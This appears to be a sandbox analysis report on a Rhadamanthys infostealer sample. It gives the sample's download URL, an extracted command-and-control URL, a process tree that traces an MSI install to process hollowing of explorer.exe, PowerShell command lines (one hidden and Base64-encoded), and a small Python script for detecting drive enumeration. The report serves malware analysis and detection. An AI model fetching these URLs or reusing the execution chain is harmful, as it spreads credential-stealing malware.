Analysis
max time kernel: 294s
max time network: 294s
platform: windows10-1703_x64
resource: win10-20231215-en
resource tags: arch:x64, arch:x86, image:win10-20231215-en, locale:en-us, os:windows10-1703-x64, system
submitted: 11/02/2024, 08:42
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://www.up-4ever.net/f81xcrmamr72
Resource: win10-20231215-en
General
Target: https://www.up-4ever.net/f81xcrmamr72
Malware Config
Extracted: http://good2-led.com/dark4.bs64
Signatures
Rhadamanthys
Rhadamanthys is an information stealer written in C++, first seen in August 2022.
Analyst reading of this run, from the signature rows and the process tree below: the downloaded setup.exe (PID 4272) starts an MSI install (msiexec.exe /i ...\installer.msi, PID 708); the Windows Installer service (msiexec.exe /V, PID 3608) runs a PowerShell script from a custom-action host (pssCB72.ps1, PID 1964), then drops and executes gnupg.exe (PID 1604), which spawns explorer.exe (PID 4288) and sets its thread context (the process-hollowing pattern). That explorer.exe launches a hidden, Base64-encoded PowerShell (PID 1640) and a dropped svchost.exe from %TEMP% (PID 2456), and is flagged for creating a process under another parent, sihost.exe (PID 3084), which is where dialer.exe (PID 3040) appears in the tree; both PowerShell processes make network requests, and explorer.exe crashes three times afterwards (WerFault). The extracted C2 URL is listed under Malware Config. Two caveats when reading rows by PID: PIDs 708 and 3852 are reused within the run (a Chrome utility process first, msiexec.exe/MsiExec.exe later), and the chrome.exe, mspaint.exe and PaintStudio.View.exe rows come from the sandbox's own browser and from the image viewer opened on your_files\password.jpg, not from the malware.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 4288 created 3084 | 4288 | explorer.exe | 44
Blocklisted process makes network request 4 IoCs
flow | pid | Process
196 | 1964 | powershell.exe
197 | 1964 | powershell.exe
210 | 1640 | powershell.exe
211 | 1640 | powershell.exe
Executes dropped EXE 2 IoCs
pid | Process
1604 | gnupg.exe
2456 | svchost.exe
Loads dropped DLL 15 IoCs
pid | Process | entries
952 | MsiExec.exe | 3
3852 | MsiExec.exe | 7
1604 | gnupg.exe | 5
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\W: \??\X: \??\Y: \??\Z: (22 entries) | setup.exe
File opened (read-only) | \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (42 entries, several letters opened more than once) | msiexec.exe
(64 entries listed in total)
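The drive-root rows above are only useful once they are aggregated per process: a single `\??\E:` open is noise, twenty distinct roots from one installer process is discovery. The following is an added example by the editor, not code from the sandbox or the report; it parses rows in the flattened form printed above and flags processes that probe at least a threshold of distinct non-system roots. The sample text is a constructed excerpt of the table (the `chrome.exe \??\C:` row is invented to exercise the system-drive exclusion), and the threshold of 5 is an assumption.

```python
"""Aggregate 'File opened (read-only) \\??\\X: <process>' rows per process.

Editor's added example; SAMPLE is a constructed excerpt of the report's
'Enumerates connected drives' table, not the full 64 rows.
"""
import re
from collections import defaultdict

# One row of the flattened table: the drive letter and the process name.
ROW = re.compile(r"File opened \(read-only\) \\\?\?\\([A-Z]): (\S+)")

SAMPLE = (  # constructed: first rows of the report plus one invented C: row
    r"File opened (read-only) \??\N: setup.exe File opened (read-only) \??\U: setup.exe "
    r"File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\K: msiexec.exe "
    r"File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe "
    r"File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: setup.exe "
    r"File opened (read-only) \??\K: setup.exe File opened (read-only) \??\P: setup.exe "
    r"File opened (read-only) \??\C: chrome.exe"
)


def drive_roots_by_process(text):
    """Map process name -> sorted distinct drive letters it opened."""
    roots = defaultdict(set)
    for letter, proc in ROW.findall(text):
        roots[proc].add(letter)
    return {proc: sorted(letters) for proc, letters in roots.items()}


def flag_drive_enumeration(text, threshold=5, ignore=("C",)):
    """Processes that opened at least `threshold` distinct roots other than
    the ignored (system) drives; threshold is a tuning assumption."""
    flagged = {}
    for proc, letters in drive_roots_by_process(text).items():
        probed = [letter for letter in letters if letter not in ignore]
        if len(probed) >= threshold:
            flagged[proc] = probed
    return flagged


if __name__ == "__main__":
    print(flag_drive_enumeration(SAMPLE))
```

Run against the full table, setup.exe reaches 22 distinct roots and msiexec.exe 23; counting distinct letters rather than raw rows is what keeps repeated opens of the same root (X:, E:, H: for msiexec.exe above) from inflating the score.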
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow | ioc
90 | drive.google.com
91 | drive.google.com
92 | drive.google.com
Drops file in System32 directory 11 IoCs
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | svchost.exe
Note: these writes are attributed in the process tree to the legitimate DataSharing service host (svchost.exe -k localsystemnetworkrestricted -s DsSvc, PID 1764), not to the dropped svchost.exe in %TEMP% (PID 2456).
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 1604 set thread context of 4288 | 1604 | gnupg.exe | 121
Drops file in Windows directory 16 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Installer\MSIC881.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID8B5.tmp | msiexec.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | svchost.exe
File opened for modification | C:\Windows\Installer\MSIC98C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC9BC.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSICA79.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\SourceHash{5DB33E67-8118-4AE0-A414-6B7A0AC6AB7A} | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Installer\e5ac808.msi | msiexec.exe
File created | C:\Windows\Installer\e5ac804.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\e5ac804.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSICA3A.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSICB17.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID74D.tmp | msiexec.exe
Program crash 3 IoCs
pid | pid_target | Process | procid_target
1592 | 4288 | WerFault.exe | 121
504 | 4288 | WerFault.exe | 121
4364 | 4288 | WerFault.exe | 121
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133521145605244619" | chrome.exe
Modifies registry class 12 IoCs
All 12 entries are under the same key, abbreviated below as <IS>:
<IS> = \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings
description | ioc | Process
Key created | <IS>\Cache\Extensible Cache | PaintStudio.View.exe
Key created | <IS>\Cache\Content | PaintStudio.View.exe
Set value (str) | <IS>\Cache\Cookies\CachePrefix = "Cookie:" | PaintStudio.View.exe
Set value (int) | <IS>\Cache\Cookies\CacheLimit = "1" | PaintStudio.View.exe
Key created | <IS>\Cache\History | PaintStudio.View.exe
Set value (str) | <IS>\Cache\History\CachePrefix = "Visited:" | PaintStudio.View.exe
Set value (int) | <IS>\Cache\History\CacheLimit = "1" | PaintStudio.View.exe
Key created | <IS>\Cache | PaintStudio.View.exe
Key created | <IS> | PaintStudio.View.exe
Set value (str) | <IS>\Cache\Content\CachePrefix | PaintStudio.View.exe
Set value (int) | <IS>\Cache\Content\CacheLimit = "51200" | PaintStudio.View.exe
Key created | <IS>\Cache\Cookies | PaintStudio.View.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
3836 | PaintStudio.View.exe
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid | Process | entries
204 | chrome.exe | 2
4980 | chrome.exe | 2
5072 | mspaint.exe | 2
3008 | mspaint.exe | 2
3836 | PaintStudio.View.exe | 32
1964 | powershell.exe | 4
3608 | msiexec.exe | 2
1640 | powershell.exe | 4
4288 | explorer.exe | 2
3040 | dialer.exe | 4
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2456 | svchost.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid | Process | entries
204 | chrome.exe | 9
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process | entries
Token: SeShutdownPrivilege | 204 | chrome.exe | 32
Token: SeCreatePagefilePrivilege | 204 | chrome.exe | 32
(64 entries listed, alternating between the two privileges)
Suspicious use of FindShellTrayWindow 38 IoCs
pid | Process | entries
204 | chrome.exe | 35
4272 | setup.exe | 1
708 | msiexec.exe | 2
Suspicious use of SendNotifyMessage 24 IoCs
pid | Process | entries
204 | chrome.exe | 24
Suspicious use of SetWindowsHookEx 4 IoCs
pid | Process
5072 | mspaint.exe
3008 | mspaint.exe
3836 | PaintStudio.View.exe
3836 | PaintStudio.View.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 204 wrote to memory of 292 | 204 | chrome.exe | 15 (2 entries)
PID 204 wrote to memory of 4180 | 204 | chrome.exe | 26
PID 204 wrote to memory of 3000 | 204 | chrome.exe | 25 (2 entries)
PID 204 wrote to memory of 1920 | 204 | chrome.exe | 24
(64 entries listed in total; every one is chrome.exe 204 writing into one of its own child processes, the bulk of them into 4180 and 1920)
Processes
(child processes are indented under their parent; each entry shows the image path, the command line, the signatures attributed to it, and its PID)

C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 204

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff86f979758,0x7ff86f979768,0x7ff86f979778
      PID: 292

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 4436

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 4608

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
      PID: 1920

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
      PID: 3000

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2
      PID: 4180

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4640 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 4620

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4844 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 1680

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
      PID: 708

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
      PID: 4792

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5356 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 2348

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5836 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 1528

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3796 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 4496

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 4112

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=768 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
      PID: 1428

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
      PID: 3188

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
      PID: 3780

    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2904 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
      PID: 4980

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  PID: 3852

c:\windows\system32\sihost.exe
  sihost.exe
  PID: 3084

    C:\Windows\SysWOW64\dialer.exe
      "C:\Windows\system32\dialer.exe"
      - Suspicious behavior: EnumeratesProcesses
      PID: 3040

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 2744

C:\Windows\system32\mspaint.exe
  "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID: 5072

C:\Windows\system32\mspaint.exe
  "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID: 3008

\??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DsSvc
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID: 1764

C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
  "C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID: 3836

C:\Users\Admin\Downloads\your_files\setup\setup.exe
  "C:\Users\Admin\Downloads\your_files\setup\setup.exe"
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  PID: 4272

    C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\your_files\setup\setup.exe SETUPEXEDIR=C:\Users\Admin\Downloads\your_files\setup\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707400341 " AI_EUIMSI=""
      - Enumerates connected drives
      - Suspicious use of FindShellTrayWindow
      PID: 708

C:\Windows\system32\msiexec.exe
  C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID: 3608

    C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding DC89B66988FA4B04CEC0520C89FCD9D3 C
      - Loads dropped DLL
      PID: 952

    C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E70F789581D10F3FA049E68B56022B52
      - Loads dropped DLL
      PID: 3852

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCB71.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          PID: 1964

    C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe
      "C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      PID: 1604

        C:\Windows\SysWOW64\explorer.exe
          explorer.exe
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Suspicious behavior: EnumeratesProcesses
          PID: 4288

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -windowstyle hidden -e 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
              - Blocklisted process makes network request
              - Suspicious behavior: EnumeratesProcesses
              PID: 1640

            C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe
              "C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe"
              - Executes dropped EXE
              - Suspicious behavior: GetForegroundWindowSpam
              PID: 2456

            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1888
              - Program crash
              PID: 1592

            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1956
              - Program crash
              PID: 504

            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1968
              - Program crash
              PID: 4364
Network
MITRE ATT&CK Enterprise v15
Downloads